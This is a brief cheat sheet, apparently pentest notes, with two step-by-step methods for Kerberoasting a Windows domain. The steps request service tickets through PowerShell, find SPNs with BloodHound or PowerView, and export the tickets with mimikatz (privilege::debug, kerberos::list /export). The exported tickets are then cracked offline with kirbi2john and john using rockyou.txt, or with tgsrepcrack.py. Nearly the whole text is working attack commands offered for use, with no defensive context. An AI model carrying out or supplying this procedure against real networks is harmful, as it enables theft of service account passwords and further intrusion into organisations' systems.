Using mimikatz
- Method 1
Run 1) and 2) in PowerShell (or cmd); this requests a service ticket for the given SPN:
1) Add-Type -AssemblyName System.IdentityModel
2) New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>"
To find the SPN, go to BloodHound > select the service account > Node Info > SPN,
or use PowerView: Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname
3) Run mimikatz.exe, then: privilege::debug
4) kerberos::list /export (exports the cached service tickets as .kirbi files)
5) exit to leave mimikatz
6) dir to check the output, pick the desired .kirbi file and transfer it to your Linux machine (if netcat is used, transfer it in binary mode)
7) kirbi2john <file> > hash.txt
8) john hash.txt --wordlist=rockyou.txt
- Method 2
1. Follow steps 1) to 5) above to export the service ticket, then:
./tgsrepcrack.py <wordlist> <.kirbi file>